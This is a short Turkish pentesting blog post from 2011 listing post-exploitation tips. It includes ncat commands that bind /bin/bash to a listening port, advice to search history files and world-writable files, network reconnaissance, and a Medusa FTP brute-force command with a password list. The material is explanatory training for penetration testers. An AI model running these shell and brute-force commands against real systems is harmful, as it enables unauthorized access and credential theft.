- # ncat -l 1900 --keep-open --send-only --ssh-exe /bin/bash &
- Bir linux sisteme girildikten sonra yapılacak araştırmalar:
- 777 izinli dosyalara bakılır
- .***_history (.bash_history gibi) dosyalarına bakılır
- -netstat -rn (routing table)
- /sbin/arp -an => network taraması
- ssh -l <user> 95.173.123.112 -p <port|22>
- FTP port açıksa:
- Hemen anonymous ftp açık olup olmadığına bakılır.
- En çok kullanılan ftp user/pwd çiftleri ile brute force denemeleri yapılır.
- İyi bir pwd list olarak backtrack içindeki /pentest/passwords/john/password.lst kullanılabilir.
- medusa ile ftp brute force => # medusa -M ftp -h <URL> -U <user-list> -P <pwd-list>
- Nessus'un raporladığı açıklıklarla ilgili önce google'da "jboss metasploit" tarzı bir arama yap.
- Karşı tarafta bir bind_tcp shell açtığımızı düşünelim.
- Eğer varsa nc (netcat) ile bir portu dinlemeye açıp oraya bağlanabiliriz.
- Yoksa, ncat, ftp, tftp vs "ne açık?" taraması yapalım.
- ncat -l 6666 --keep-open --udp --send_only --ssh.exe /bin/bash &
Önceleri web uygulama güvenliğine özel olması düşünülen blog, daha sonra diğer sızma testleri konularını da kapsayacak şekilde genişletilmiştir.
25 Temmuz 2011 Pazartesi
Pentest in Practice - IX: Pratik Bilgiler
Kaydol:
Kayıt Yorumları (Atom)
Web Uygulama Sızma Testleri İçin Kontrol Listeleri - V
Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....
-
& (%26) URL sorgu tümcesindeki parametreleri mesaj gövdesinden ayırmada kullanılır. = (%3d) URL sorgu tümcesindeki parametrelerin i...
-
Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....
-
OWASP'ın 2010 yılı için açıkladığı en önemli 10 güvenlik riski ve bunlar için en faydalı araçlardan birer örnek, bu yazının konusunu ol...
Hiç yorum yok:
Yorum Gönder